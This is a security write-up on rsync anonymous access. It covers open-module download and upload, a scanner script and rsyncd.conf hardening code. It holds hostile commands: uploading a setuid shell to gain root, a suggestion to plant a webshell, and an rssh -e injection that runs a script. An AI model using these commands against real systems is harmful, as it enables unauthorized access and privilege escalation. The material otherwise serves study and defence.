Rsync anonymous access vulnerability

Foreword



Two days ago I summarized the common vulnerabilities found on the Internet and in IT companies' intranets, and then decided to study the ones I haven't learned yet, one by one. Today is the first one. It will be done this year. Why is it so difficult? Because I am usually busy with work, I don't necessarily have time to study every week. Common web vulnerabilities and weak-password vulnerabilities are not included in this study.

Introduction to Rsync



What is Rsync


Rsync (remote synchronize) is a remote data synchronization tool that can quickly synchronize files between multiple hosts via LAN/WAN.

What is Rsync anonymous access


Anonymous access is simple: no user name is required, and none of the information normally used for authentication (passwords, public and private keys, biometrics, and so on) is required. In short, the service can be accessed directly, without any access control.

General hazards


Download: #rsync -avz a.b.c.d::path/file path/filename
Upload:   #rsync -avz path/filename a.b.c.d::path/file

Privilege escalation


#chmod a+s shell
#rsync -avz shell a.b.c.d::path/file
*Check that the shell's permissions are unchanged after upload; running it escalates privileges to root. You can also try uploading a webshell.*
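The daemon-side view of the two sections above (anonymous download and upload, and the setuid upload), as an added example that is not part of the original post: a small Python auditor for rsyncd.conf that flags modules reachable without `auth users`, writable anonymously, served with `uid = root`, or missing an `incoming chmod` clause that strips the setuid bit. The two configurations inside it are constructed for the example, and the finding names are my own; the parameter names (`auth users`, `read only`, `hosts allow`, `uid`, `incoming chmod`, `list`, `use chroot`, `secrets file`) are real rsyncd.conf parameters.

```python
"""Added example: audit an rsyncd.conf for the anonymous-access and setuid
upload risks described above.  Not code from the original post; the two
configurations below are constructed for the example."""

# Constructed weak configuration: the daemon runs as root, module "backup"
# is writable with no "auth users" (anyone can upload, for example a setuid
# binary), and "www" is readable by anyone.
WEAK_CONF = """
uid = root
gid = root
use chroot = no

[backup]
    path = /data/backup
    comment = nightly backups
    read only = no

[www]
    path = /var/www
"""

# Constructed hardened configuration for the same writable module.
HARDENED_CONF = """
uid = nobody
gid = nogroup
use chroot = yes
hosts allow = 10.0.0.0/8

[backup]
    path = /data/backup
    read only = no
    auth users = backupuser
    secrets file = /etc/rsyncd.secrets
    incoming chmod = u-s,g-s
    list = no
"""


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf into (global_params, {module: params}).

    Sections are "[name]", parameters are "key = value", and lines starting
    with '#' or ';' are comments.  Keys are lower-cased."""
    global_params, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
            continue
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        target = modules[current] if current is not None else global_params
        target[key.strip().lower()] = value.strip()
    return global_params, modules


def _as_bool(value, default):
    """rsyncd.conf booleans: yes/true/1 are true; an absent value means the default."""
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def audit(text):
    """Return {module: [finding, ...]} using rsync's defaults for absent
    parameters (read only = yes, list = yes, use chroot = yes, uid = nobody).
    Global parameters act as defaults that each module may override."""
    global_params, modules = parse_rsyncd_conf(text)
    report = {}
    for name, params in modules.items():
        eff = {**global_params, **params}
        findings = []
        anonymous = "auth users" not in eff
        writable = not _as_bool(eff.get("read only"), True)
        if anonymous:
            findings.append("anonymous-read")
        if anonymous and writable:
            findings.append("anonymous-write")
        if "hosts allow" not in eff:
            findings.append("no-hosts-allow")
        if writable and eff.get("uid", "nobody").lower() in ("root", "0"):
            findings.append("writable-as-root")
        # "incoming chmod" uses --chmod syntax; a "-s" clause clears the
        # setuid/setgid bits on uploaded files (heuristic substring check).
        if writable and "-s" not in eff.get("incoming chmod", ""):
            findings.append("setuid-not-stripped")
        if _as_bool(eff.get("list"), True):
            findings.append("listed")
        if not _as_bool(eff.get("use chroot"), True):
            findings.append("no-chroot")
        report[name] = findings
    return report


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for module, findings in audit(conf).items():
            print("%s [%s]: %s" % (label, module, ", ".join(findings) or "ok"))
```

Run it against a copy of your own rsyncd.conf by passing the file contents to `audit()`. The hardened module still allows uploads, but only to an authenticated user from the allowed network, with the daemon dropped to `nobody` and the setuid bit removed from anything it writes, which closes the upload-a-setuid-shell path described above.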

rssh


Also, rssh-2.3.3-3 does not properly filter the -e option, which can cause problems.

#rsync -e ./script.sh a.b.c.d::/tmp --server ./

Vulnerability verification


  • Metasploit's auxiliary/scanner/rsync/modules_list
  • Python script

# -*- coding:utf-8 -*-
"""
    Rsync anonymous access (unauthorized access) vulnerability verification tool
"""

# Import the required packages and library modules
import sys
import socket
import logging

# Global configuration
logging.basicConfig(level=logging.INFO, format="%(message)s")
socket.setdefaulttimeout(3)


# Global variables
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# Global functions:
def str2Binary(content):
    """Convert a hex text string into a byte string"""
    return bytes.fromhex(content.replace(' ', '').replace('\n', ''))


def rsyncCheck(ip, port):
    """Run the port pre-check: connect, exchange the daemon greeting, request the module list"""
    global client
    try:
        client.connect((ip, port))
    except Exception as reason:
        logging.error("[-] Connection failed: %s" % reason)
        return False
    # "@RSYNCD: 31.0\n" as hex: the client's side of the rsync daemon greeting
    helloString = "405253594e43443a2033312e300a"
    try:
        client.send(str2Binary(helloString))
        hellodata = client.recv(1024)
    except Exception as reason:
        logging.error("[-] Communication failed: %s" % reason)
        return False
    if hellodata.find(b"@RSYNCD") >= 0:
        try:
            # An empty line ("\n") asks the daemon to list its modules
            client.send(str2Binary("0a"))
        except Exception as reason:
            logging.error("[-] Request failed: %s" % reason)
            return False
        while True:
            try:
                data = client.recv(1024)
            except Exception as reason:
                # On a read error or timeout, stop instead of looping on stale data
                logging.error("[-] Communication failed: %s" % reason)
                return False
            if data == b"":
                break
            else:
                # The daemon closes the module listing with "@RSYNCD: EXIT"
                if data.find(b"@RSYNCD: EXIT") >= 0:
                    logging.info("[*] Vulnerability found!")
                    return True
    return False


if __name__ == "__main__":
    ip = sys.argv[1]
    try:
        port = sys.argv[2]
    except Exception as reason:
        port = 873
        logging.error("[-] No port given, using the default port 873")
    try:
        port = int(port)
    except Exception as reason:
        logging.error("[-] Invalid port, using the default port 873")
        port = 873
    if not rsyncCheck(ip, port):
        logging.info("[+] Test passed, no issue found!")
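The listing exchange that the script above drives with raw hex, as an added example that is not part of the original post: a parser that performs the daemon greeting and module-list request over any byte transport and returns the module names rather than only spotting the `@RSYNCD: EXIT` line. That matters for triage, because the daemon sends `@RSYNCD: EXIT` after an empty list too, so the script above reports "vulnerability found" for a daemon that exposes nothing. The transcript `FAKE_DAEMON_OUTPUT` is constructed to look like a daemon's replies; `list_from_daemon` and `list_from_transcript` are my own names.

```python
"""Added example: the rsync daemon greeting and module-list exchange as a
reusable parser.  Not code from the original post; FAKE_DAEMON_OUTPUT is a
constructed transcript of what a daemon with two listable modules sends."""
import io
import socket
import sys

# Constructed daemon transcript.  rsync prints each listable module as a
# left-justified name, a tab, then the module comment.
FAKE_DAEMON_OUTPUT = (
    b"@RSYNCD: 31.0\n"
    b"backup         \tnightly backups\n"
    b"www            \twebroot\n"
    b"@RSYNCD: EXIT\n"
)


def module_list_exchange(recv_line, send):
    """Perform the greeting and module-list request over any byte transport
    and return the list of module names the daemon advertised.

    recv_line() must return one line including its newline (b"" at EOF);
    send(data) must deliver the bytes to the daemon."""
    greeting = recv_line()
    if not greeting.startswith(b"@RSYNCD:"):
        raise ValueError("not an rsync daemon greeting: %r" % greeting)
    send(b"@RSYNCD: 31.0\n")   # our protocol version, the same bytes the script sends
    send(b"\n")                # an empty module name asks for the module list
    modules = []
    while True:
        line = recv_line()
        if not line:
            raise ConnectionError("daemon closed the connection before @RSYNCD: EXIT")
        line = line.rstrip(b"\r\n")
        if line == b"@RSYNCD: EXIT":
            return modules
        if line.startswith(b"@"):
            # @ERROR or another daemon control line instead of a module entry
            raise RuntimeError(line.decode("utf-8", "replace"))
        modules.append(line.split(b"\t", 1)[0].strip().decode("utf-8", "replace"))


def list_from_transcript(transcript):
    """Run the exchange against a recorded transcript; returns (modules, bytes sent)."""
    reader = io.BytesIO(transcript)
    sent = []
    return module_list_exchange(reader.readline, sent.append), sent


def list_from_daemon(host, port=873, timeout=3):
    """Run the exchange against a live daemon that you administer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with sock.makefile("rb") as reader:
            return module_list_exchange(reader.readline, sock.sendall)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 873
        modules = list_from_daemon(sys.argv[1], port)
    else:
        modules, _ = list_from_transcript(FAKE_DAEMON_OUTPUT)
    print("listed modules: %s" % (modules or "(none)"))
```

With no arguments the block replays the constructed transcript; with a host (and optional port) it talks to a real daemon. Cross-check every name it returns against the `auth users`, `read only` and `hosts allow` settings of that module in rsyncd.conf: a module that is listed is not necessarily anonymous, and a module with `list = no` is reachable without appearing here.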
